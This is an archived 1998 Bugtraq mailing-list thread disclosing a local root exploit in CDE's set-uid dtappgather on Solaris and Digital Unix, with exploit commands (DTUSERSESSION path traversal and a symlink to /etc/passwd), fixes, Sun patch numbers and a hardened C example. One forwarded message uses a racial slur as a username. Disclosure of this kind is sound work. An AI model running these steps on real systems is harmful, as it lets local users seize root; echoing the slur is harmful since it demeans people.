I tried this on DUnix 4.0D and got it to change /etc/passwd to mode
755, owned by my uid. If dtappgather is suid root on your system, you
should remove the suid bit until Digital/Compaq comes out with a fix.
Mike Iglesias Internet: iglesias_at_draco.acs.uci.edu
University of California, Irvine phone: 949-824-6926
Office of Academic Computing FAX: 949-824-2069
------- Forwarded Message
Delivery-Date: Tue, 03 Nov 1998 15:40:01 -0800
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143]) by draco.acs.uci.edu (8.8.5/8.7.1) with ESMTP id PAA26707 for <iglesias_at_DRACO.ACS.UCI.EDU>; Tue, 3 Nov 1998 15:40:00 -0800 (PST)
Received: from netspace.org ([128.148.157.6]:11541 "EHLO netspace.org" ident: "TIMEDOUT2") by brimstone.netspace.org with ESMTP id <73700-27533>; Tue, 3 Nov 1998 18:31:04 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with spool id 4582636 for BUGTRAQ_at_NETSPACE.ORG; Tue, 3 Nov 1998 18:29:01 -0500
Approved-By: aleph1_at_DFW.NET
Received: from amb1.amb.polimi.it (amb1.amb.polimi.it [131.175.33.1]) by netspace.org (8.8.7/8.8.7) with SMTP id LAA22730 for <BUGTRAQ_at_netspace.org>; Mon, 2 Nov 1998 11:06:07 -0500
Received: from localhost by amb1.amb.polimi.it with SMTP (1.38.193.4/16.2) id AA26203; Mon, 2 Nov 1998 18:06:00 +0100
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.HPP.3.96.981102175301.25800A-100000_at_amb1.amb.polimi.it>
Date: Mon, 2 Nov 1998 18:05:59 +0100
Reply-To: Andrea Costantino <costan_at_AMB1.AMB.POLIMI.IT>
Sender: Bugtraq List <BUGTRAQ_at_netspace.org>
From: Andrea Costantino <costan_at_AMB1.AMB.POLIMI.IT>
Subject: another /usr/dt/bin/dtappgather feature!
X-To: news_at_rootshell.com
To: BUGTRAQ_at_netspace.org
There's attached the message related to this new feature..
the /usr/dt/bin/dtappgather program tries to read the environment variable
$DTUSERSESSION to get the name of the file to seek for.
The file is searched in /var/dt/appconfig/appmanager.
Under SunOS 5.5,5.5.1 (aka Solaris 2.5, 2.5.1) that directory is 777 or
01777 so you're able to make a symbolic link to the file you wish, but on
SunOS 5.6 (Solaris 2.6) the directory is 755 to avoid this.
Unfortunately dtappgather never checks the $DTUSERSESSION variable, so
you can use the syntax ../../.. etc... to grab the file you wish, even if
you can't write the /var/dt/appconfig/appmanager directory....
For example:
costan_at_penelope$ ls -ald /var/dt/appconfig/appmanager
drwxr-xr-x 9 bin bin 512 Oct 30 11:27 /var/dt/appconfig/appmanager
costan_at_penelope$ export $DTUSERSESSION=../../../../etc/passwd
costan_at_penelope$ /usr/dt/bin/dtappgather
[.... stuff ....]
costan_at_penelope$ ls -al /etc/passwd
-r-xr-xr-x 1 costan users 531 Oct 9 14:08 /etc/passwd
This way you're satisfied even without making strange links on strange paths
(the names in CDE are very difficult to remember ;-) )
Best Wishes, admins...
Andrea Costantino (aka k0stan)
Network Manager at DIIAR
Politecnico di Milano
Attached message:
[ http://www.rootshell.com/ ]
Date: Mon, 23 Feb 1998 15:31:16 +0200
From: Mastoras <mastoras_at_PAPARI.HACK.GR>
Subject: /usr/dt/bin/dtappgather exploit
Buggy program:
/usr/dt/bin/dtappgather
Description of the problem:
Local users can change the ownership of any file, thus gaining
root privileges. This happens because "dtappgather" does not check if the
file /var/dt/appconfig/appmanager/generic-display-0 is a symbolic link and
happily chown()s it to the user. When CERT released advisory CA-98.02
about /usr/dt/bin/dtappgather, I played a little with dtappgather and
discovered the problem above, but I thought that patch 104498-02 corrects it,
as described in SUN's section of 98.02. When I applied the patch, I
realised that it was still possible to gain root privs.
Systems Affected:
*At least* SunOS 5.5 & 5.5.1 running CDE version 1.0.2 with suid
bit on /usr/dt/bin/dtappgather. SunOS 5.6 (or CDE 1.2) comes with
directory /var/dt/appconfig/appmanager/ mode 755 so it's not possible to
make the necessary link. On the other hand, in SunOS 5.5* this dir has
mode 777, so you can easily make the link or even unlink/rename the file
"generic-display-0" if it exists owned by another user.
Quick Fix:
chmod -s /usr/dt/bin/dtappgather
The Exploit:
The forwarded exploit was initially posted to hack.gr's security
mailing list: "haxor".
Hack wisely,
Mastoras
/*
* Computer Engineering & Informatics Department, Patras, Greece
* Mastor Wins, Fatality!
http://www.hack.gr/users/mastoras
*/
---------- Forwarded message ----------
Date: Sat, 24 Jan 1998 02:48:13 +0200 (EET)
From: Mastoras <mastoras_at_papari.hack.gr>
Reply-To: haxor_at_hack.gr
To: haxor_at_papari.hack.gr, Undisclosed recipients: ;
Subject: [HAXOR:11] dtappgather exploit
Hello,
I suppose you have learnt about CERT's advisory on dtappgather
program. Well, here's the exploit:
nigg0r_at_host% ls -l /etc/passwd
-r--r--r-- 1 root other 1585 Dec 17 22:26 /etc/passwd
nigg0r_at_host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0
nigg0r_at_host% dtappgather
MakeDirectory: /var/dt/appconfig/appmanager/generic-display-0: File exists
nigg0r_at_host% ls -l /etc/passwd
-r-xr-xr-x 1 nigg0r niggers 1585 Dec 17 22:26 /etc/passwd
nigg0r_at_host% echo "nigg0r wins! Fatality!" | mail root
it would be easy to find the exploit if you had read CERT's advisory.
the following steps were enough..
% cp /usr/dt/bin/dtappgather . [you can't "truss" suid proggies]
% truss -o koko ./dtappgather
% more koko
[ shitty ld things ]
chown("/var/dt/appconfig/appmanager/generic-display-0", 666, 666) = 0
chmod("/var/dt/appconfig/appmanager/generic-display-0", 0555) = 0
[ shitty things ]
I hope this was not too lame or well-known :-)
Seeya,
mastoras
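Both reports describe the same defect: a set-uid program takes a file name it does not control (the $DTUSERSESSION value, or a fixed name inside a world-writable directory), and chown()s and chmod()s the resulting path without checking for ".." components or symbolic links, as the truss output above shows. What follows is an added example, not dtappgather's code and not any vendor patch, of how a privileged program does the same operation safely in C: accept only a single plain path component, open it relative to the configuration directory with O_NOFOLLOW, confirm with fstat() that the opened object is a regular file, and then fchown()/fchmod() the descriptor rather than the path, so the object that was checked is the object that is modified. The function names, the scratch directory created by mkdtemp() in the self-check, and the 0555 mode are assumptions for illustration.

```c
/* Added example (not dtappgather's code): hardened form of the
 * "chown a file named by an untrusted session name" pattern.
 * Function names and the mkdtemp() self-check are assumptions. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Accept only a plain file name: no '/', not "." or "..", a conservative
 * character set, bounded length. This blocks the ../../../etc/passwd trick. */
int session_name_is_safe(const char *name)
{
    size_t n;
    if (name == NULL || *name == '\0')
        return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0)
        return 0;
    for (n = 0; name[n] != '\0'; n++) {
        char c = name[n];
        if (!((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
              (c >= '0' && c <= '9') || c == '-' || c == '_' || c == '.'))
            return 0;
    }
    return n < 64;
}

/* Open dir/name without following a symlink at either step (O_NOFOLLOW),
 * then verify via fstat() that it is a regular file.
 * Returns an fd, or -1 with errno set (ELOOP when the name was a symlink). */
int open_session_file_nofollow(const char *dir, const char *name)
{
    int dfd, fd;
    struct stat st;

    if (!session_name_is_safe(name)) {
        errno = EINVAL;
        return -1;
    }
    dfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (dfd < 0)
        return -1;
    fd = openat(dfd, name, O_RDONLY | O_NOFOLLOW | O_NOCTTY);
    close(dfd);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) {
        close(fd);
        errno = EINVAL;
        return -1;
    }
    return fd;
}

/* Change owner and mode through the descriptor, not the path, so the
 * checked inode and the modified inode are the same. 0 on success. */
int give_session_file_to_user(const char *dir, const char *name,
                              uid_t uid, gid_t gid)
{
    int fd = open_session_file_nofollow(dir, name);
    if (fd < 0)
        return -1;
    if (fchown(fd, uid, gid) != 0 || fchmod(fd, 0555) != 0) {
        int saved = errno;
        close(fd);
        errno = saved;
        return -1;
    }
    close(fd);
    return 0;
}

/* Self-check on constructed data: a scratch directory holding a regular
 * file and a symlink to it. The symlink must be refused with ELOOP, the
 * regular file must be accepted. Returns 1 when behaviour is as expected. */
int demo_symlink_rejected(void)
{
    char tmpl[] = "/tmp/dtgather-demo-XXXXXX";
    char target[256], link[256];
    int fd, ok = 1;

    if (mkdtemp(tmpl) == NULL)
        return 0;
    snprintf(target, sizeof target, "%s/target", tmpl);
    snprintf(link, sizeof link, "%s/generic-display-0", tmpl);
    fd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (fd < 0) ok = 0; else close(fd);
    if (ok && symlink(target, link) != 0) ok = 0;
    if (ok) {   /* symlink named like the CDE file: must be rejected */
        errno = 0;
        fd = open_session_file_nofollow(tmpl, "generic-display-0");
        if (fd >= 0 || errno != ELOOP) { ok = 0; if (fd >= 0) close(fd); }
    }
    if (ok && give_session_file_to_user(tmpl, "target", getuid(), getgid()) != 0)
        ok = 0;
    unlink(link); unlink(target); rmdir(tmpl);
    return ok;
}

int main(void)
{
    printf("traversal name accepted? %d\n", session_name_is_safe("../../../../etc/passwd"));
    printf("symlink refused, real file accepted? %d\n", demo_symlink_rejected());
    return 0;
}
```

The name check alone defeats the $DTUSERSESSION traversal; O_NOFOLLOW plus fstat() defeats the symlink in a 777 directory; doing the chown through the descriptor closes the gap between check and use. Any one of the three on its own leaves a path to the original problem.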
--------------------------------------------------------------------------
Steven Goldberg - SE - Seattle WA (steven.goldberg_at_West.Sun.COM)
Hi,
Sun has published the following patches to address this
vulnerability:
patches 104497 CDE 1.0.1: dtappgather patch
patches 104498 CDE 1.0.2: dtappgather patch
patches 104499 CDE 1.0.1_x86: dtappgather patch
patches 104500 CDE 1.0.2_x86: dtappgather patch
patches 105837 CDE 1.2: dtappgather Patch
patches 105838 CDE 1.2_x86: dtappgather Patch
thanks,
Steve
------- End of Forwarded Message
Received on Wed Nov 04 1998 - 18:19:14 NZDT